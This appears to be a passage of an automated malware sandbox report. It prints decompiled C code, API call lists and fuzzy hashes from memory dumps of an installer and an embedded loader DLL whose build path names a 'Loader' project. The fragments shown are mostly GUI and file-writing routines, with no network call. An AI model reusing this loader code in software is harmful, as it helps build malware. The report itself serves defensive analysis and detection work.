				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                  0x00403ecd
                                                  0x00403f61
                                                  0x00000000
                                                  0x00403f61
                                                  0x00403ede
                                                  0x00403ee2
                                                  0x00000000
                                                  0x00000000
                                                  0x00403ee8
                                                  0x00403ef1
                                                  0x00403ef4
                                                  0x00403ef4
                                                  0x00403efa
                                                  0x00403f00
                                                  0x00403f00
                                                  0x00403f0c
                                                  0x00403f12
                                                  0x00403f19
                                                  0x00403f1c
                                                  0x00403f1f
                                                  0x00403f21
                                                  0x00403f21
                                                  0x00403f29
                                                  0x00403f2f
                                                  0x00403f2f
                                                  0x00403f39
                                                  0x00403f3e
                                                  0x00403f41
                                                  0x00403f46
                                                  0x00403f49
                                                  0x00403f49
                                                  0x00403f59
                                                  0x00403f59
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                  • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                                  • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                  • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056F8(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E00405850(_t52);
				_t27 = E0040586F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f54; // 0x8200
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030B3(_t47);
						E00403081(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                  0x004026af
                                                  0x004026b1
                                                  0x004026bd
                                                  0x004026c0
                                                  0x004026ca
                                                  0x004026ce
                                                  0x004026ce
                                                  0x004026d4
                                                  0x004026e1
                                                  0x004026e9
                                                  0x004026ec
                                                  0x004026f2
                                                  0x00402700
                                                  0x00402705
                                                  0x00402709
                                                  0x0040270c
                                                  0x00402715
                                                  0x00402721
                                                  0x00402725
                                                  0x00402728
                                                  0x00402732
                                                  0x00402751
                                                  0x00402739
                                                  0x0040273e
                                                  0x00402746
                                                  0x00402749
                                                  0x0040274e
                                                  0x0040274e
                                                  0x00402758
                                                  0x00402758
                                                  0x0040276a
                                                  0x00402771
                                                  0x00402783
                                                  0x00402783
                                                  0x00402789
                                                  0x00402789
                                                  0x00402794
                                                  0x00402795
                                                  0x00402799
                                                  0x0040279d
                                                  0x004027a3
                                                  0x004027a3
                                                  0x004027aa
                                                  0x00402197
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                  • GlobalFree.KERNEL32(?), ref: 00402758
                                                  • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402771
                                                  • CloseHandle.KERNEL32(?), ref: 00402789
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                  • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                                  • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                  • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404E84, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404E84(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423724; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423ff4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
					}
					_t26 = lstrlenA(0x41fd10);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd10;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd10)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd10, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                  0x00404e8a
                                                  0x00404e96
                                                  0x00404e99
                                                  0x00404e9f
                                                  0x00404eab
                                                  0x00404eae
                                                  0x00404eb1
                                                  0x00404eb7
                                                  0x00404eb7
                                                  0x00404ebd
                                                  0x00404ec5
                                                  0x00404ec8
                                                  0x00404ee5
                                                  0x00404ee9
                                                  0x00404ef2
                                                  0x00404ef2
                                                  0x00404efc
                                                  0x00404f05
                                                  0x00404f11
                                                  0x00404f18
                                                  0x00404f1c
                                                  0x00404f1f
                                                  0x00404f32
                                                  0x00404f40
                                                  0x00404f40
                                                  0x00404f44
                                                  0x00404f46
                                                  0x00404f49
                                                  0x00000000
                                                  0x00404f49
                                                  0x00404eca
                                                  0x00404ed2
                                                  0x00404eda
                                                  0x00404ee0
                                                  0x00000000
                                                  0x00404ee0
                                                  0x00404eda
                                                  0x00404ec8
                                                  0x00404f53

                                                  APIs
                                                  • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                  • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                  • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                  • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                  • SendMessageA.USER32 ref: 00404F18
                                                  • SendMessageA.USER32 ref: 00404F32
                                                  • SendMessageA.USER32 ref: 00404F40
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                  • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                                  • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                  • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404753, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404753(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                  0x00404761
                                                  0x0040476e
                                                  0x00404774
                                                  0x004047b2
                                                  0x004047b2
                                                  0x004047c1
                                                  0x004047c8
                                                  0x00000000
                                                  0x004047ca
                                                  0x00404776
                                                  0x00404785
                                                  0x0040478d
                                                  0x00404790
                                                  0x004047a2
                                                  0x004047a8
                                                  0x004047af
                                                  0x00000000
                                                  0x004047af
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                  • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                                  • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                  • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b0d8; // 0x8200
					_t11 =  *0x41f0e8;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                  0x00402b7b
                                                  0x00402b89
                                                  0x00402b8f
                                                  0x00402b8f
                                                  0x00402b9d
                                                  0x00402b9f
                                                  0x00402ba5
                                                  0x00402bac
                                                  0x00402bae
                                                  0x00402bae
                                                  0x00402bc4
                                                  0x00402bd4
                                                  0x00402be6
                                                  0x00402be6
                                                  0x00402bee

                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                  • MulDiv.KERNEL32 ref: 00402BB4
                                                  • wsprintfA.USER32 ref: 00402BC4
                                                  • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402BBE
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                  • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                                  • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                  • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73054160, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 47%
                                                  			E73054160(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v60;
				signed short* _t48;
				signed short* _t50;
				char* _t53;
				void* _t87;
				void* _t89;
				void* _t90;

				_t86 = __esi;
				_t85 = __edi;
				_t66 = __ebx;
				_v28 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 8));
				_v20 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0xc));
				_v44 =  &_v60;
				_v40 = 0x7306731c;
				_v36 = 1;
				_v32 = 1;
				0x73050000("\n");
				_t48 = E73051C90(_a4, 0);
				_t89 = _t87 + 0xc;
				_t78 =  *_t48 & 0x0000ffff;
				if(( *_t48 & 0x0000ffff) != 0) {
					_t50 = E73051C90(_a4, 0);
					_t90 = _t89 + 8;
					__eflags = ( *_t50 & 0x0000ffff) - 0xd;
					if(__eflags != 0) {
						_push(0x711);
						E73055DA9(__ebx, _t78, __edi, __esi, __eflags, L"V_VT(stack_top(ctx, 0)) == VT_UNKNOWN", L"C:\\xampp\\htdocs\\Loct\\87441519555141b6935f4940bcbda0c2\\Loader\\Project4\\Project4\\Source.c");
						_t90 = _t90 + 0xc;
					}
					_v16 =  *((intOrPtr*)(E73051C90(_a4, 0) + 8));
					_v60 = 0;
					_t53 =  &_v60;
					0x73050000(_v16, 1, _t53, 0);
					_v8 = _t53;
					__eflags = _v8;
					if(_v8 >= 0) {
						__eflags = _v8;
						if(__eflags != 0) {
							_v12 = 0;
						} else {
							_v12 = 1;
						}
						_v24 = _v12;
						_v8 = E73052C80(_t66, _t85, _t86, __eflags, _a4, _v20, 0xc,  &_v44);
						__imp__#9( &_v60);
						__eflags = _v8;
						if(_v8 >= 0) {
							__eflags = _v24;
							if(_v24 == 0) {
								E73051DA0(_a4, _a4, 1);
								E73052230(_a4, _v28);
							} else {
								 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + 0x10;
							}
							__eflags = 0;
							return 0;
						} else {
							return _v8;
						}
					} else {
						return _v8;
					}
				}
				0x73050000("uninitialized\n");
				return 0x80004005;
			}




















                                                  0x73054160
                                                  0x73054160
                                                  0x73054160
                                                  0x7305416f
                                                  0x7305417b
                                                  0x73054181
                                                  0x73054184
                                                  0x7305418b
                                                  0x73054192
                                                  0x7305419e
                                                  0x730541ac
                                                  0x730541b1
                                                  0x730541b4
                                                  0x730541b9
                                                  0x730541d8
                                                  0x730541dd
                                                  0x730541e3
                                                  0x730541e6
                                                  0x730541e8
                                                  0x730541f7
                                                  0x730541fc
                                                  0x730541fc
                                                  0x73054210
                                                  0x73054215
                                                  0x7305421b
                                                  0x73054225
                                                  0x7305422d
                                                  0x73054230
                                                  0x73054234
                                                  0x7305423e
                                                  0x73054242
                                                  0x7305424d
                                                  0x73054244
                                                  0x73054244
                                                  0x73054244
                                                  0x73054257
                                                  0x73054270
                                                  0x73054277
                                                  0x7305427d
                                                  0x73054281
                                                  0x73054288
                                                  0x7305428c
                                                  0x730542a5
                                                  0x730542b5
                                                  0x7305428e
                                                  0x7305429a
                                                  0x7305429a
                                                  0x730542bd
                                                  0x00000000
                                                  0x73054283
                                                  0x00000000
                                                  0x73054283
                                                  0x73054236
                                                  0x00000000
                                                  0x73054236
                                                  0x73054234
                                                  0x730541c0
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 73051C90: __wassert.LIBCMT ref: 73051CAD
                                                  • __wassert.LIBCMT ref: 730541F7
                                                  Strings
                                                  • V_VT(stack_top(ctx, 0)) == VT_UNKNOWN, xrefs: 730541F2
                                                  • C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c, xrefs: 730541ED
                                                  • uninitialized, xrefs: 730541BB
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __wassert
                                                  • String ID: C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c$V_VT(stack_top(ctx, 0)) == VT_UNKNOWN$uninitialized
                                                  • API String ID: 3993402318-3397516955
                                                  • Opcode ID: d2097449289c97a51c69b60070b52a1164e1a9ad0ae85d663b2a0ac4bc2f79e2
                                                  • Instruction ID: a9687e2e0968d68f795a8fd99977b0229dd02f479213053b359d70a049884583
                                                  • Opcode Fuzzy Hash: d2097449289c97a51c69b60070b52a1164e1a9ad0ae85d663b2a0ac4bc2f79e2
                                                  • Instruction Fuzzy Hash: 4A4171B5D00218EFEB04CF94C845FDE7BB5AF84B04F648458F908AB385E7759A84CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73053A70, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s %u$got ref.type = %d$lookup %s failed: %08x
                                                  • API String ID: 0-1774865569
                                                  • Opcode ID: 81483c5744d6fe09b8058000faaff532d19b3500b19367e4c382d0dd3b494e10
                                                  • Instruction ID: 11c0e8e92ee657d96d27528c1410df8a2dc288a998a1a803beb55ae7bccb160b
                                                  • Opcode Fuzzy Hash: 81483c5744d6fe09b8058000faaff532d19b3500b19367e4c382d0dd3b494e10
                                                  • Instruction Fuzzy Hash: 303143B5E00208EFDB04DB94D844FAEB7B5EF88704F148599F919AB345E7359A40CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 730532E0, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 36%
                                                  			E730532E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				char _v28;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t42;
				intOrPtr _t52;
				intOrPtr* _t55;
				void* _t67;
				void* _t69;

				_t66 = __esi;
				_t65 = __edi;
				_t50 = __ebx;
				_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 8));
				_t35 = _v12;
				0x73050000(_t35);
				0x73050000("%s\n", _t35);
				_t69 = _t67 + 0xc;
				_t52 = _a4;
				_t58 =  *((intOrPtr*)(_t52 + 0xc));
				_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t52 + 0xc))));
				if( *((intOrPtr*)( *((intOrPtr*)(_t52 + 0xc)))) != 0) {
					_push(0x55a);
					E73055DA9(__ebx, _t58, __edi, __esi, _t76, L"ctx->func->type == FUNC_GLOBAL", L"C:\\xampp\\htdocs\\Loct\\87441519555141b6935f4940bcbda0c2\\Loader\\Project4\\Project4\\Source.c");
					_t69 = _t69 + 0xc;
				}
				_t37 = E73051730(_t50, _t65, _t66, _a4, _v12, 0,  &_v28);
				_v8 = _t37;
				if(_v8 >= 0) {
					__eflags = _v28;
					if(__eflags == 0) {
						_v8 = E73051EE0(__eflags, _a4, 0);
						__eflags = _v8;
						if(_v8 >= 0) {
							_t54 = _v12;
							_v8 = E73051A60(_a4, _v12, 1,  &_v16);
							__eflags = _v8;
							if(_v8 >= 0) {
								_t42 = E73051C40(_t54, _a4);
								_t55 = _v16;
								 *_t55 =  *_t42;
								 *((intOrPtr*)(_t55 + 4)) =  *((intOrPtr*)(_t42 + 4));
								 *((intOrPtr*)(_t55 + 8)) =  *((intOrPtr*)(_t42 + 8));
								 *((intOrPtr*)(_t55 + 0xc)) =  *((intOrPtr*)(_t42 + 0xc));
								__eflags = 0;
								return 0;
							}
							return _v8;
						}
						return _v8;
					}
					0x73050000(_v12);
					0x73050000("%s already defined\n", _t37);
					return 0x80004005;
				} else {
					return _v8;
				}
			}














                                                  0x730532e0
                                                  0x730532e0
                                                  0x730532e0
                                                  0x730532ef
                                                  0x730532f2
                                                  0x730532f6
                                                  0x73053304
                                                  0x73053309
                                                  0x7305330c
                                                  0x7305330f
                                                  0x73053312
                                                  0x73053315
                                                  0x73053317
                                                  0x73053326
                                                  0x7305332b
                                                  0x7305332b
                                                  0x7305333c
                                                  0x73053344
                                                  0x7305334b
                                                  0x73053355
                                                  0x73053359
                                                  0x7305338a
                                                  0x7305338d
                                                  0x73053391
                                                  0x7305339e
                                                  0x730533ae
                                                  0x730533b1
                                                  0x730533b5
                                                  0x730533c0
                                                  0x730533c8
                                                  0x730533cd
                                                  0x730533d2
                                                  0x730533d8
                                                  0x730533de
                                                  0x730533e1
                                                  0x00000000
                                                  0x730533e1
                                                  0x00000000
                                                  0x730533b7
                                                  0x00000000
                                                  0x73053393
                                                  0x7305335f
                                                  0x7305336d
                                                  0x00000000
                                                  0x7305334d
                                                  0x00000000
                                                  0x7305334d

                                                  APIs
                                                  • __wassert.LIBCMT ref: 73053326
                                                    • Part of subcall function 73055DA9: GetModuleHandleExW.KERNEL32(00000006,00000000,?), ref: 73055E6E
                                                    • Part of subcall function 73055DA9: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 73055E9A
                                                  Strings
                                                  • C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c, xrefs: 7305331C
                                                  • ctx->func->type == FUNC_GLOBAL, xrefs: 73053321
                                                  • %s already defined, xrefs: 73053368
                                                  • %s, xrefs: 730532FF
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Module$FileHandleName__wassert
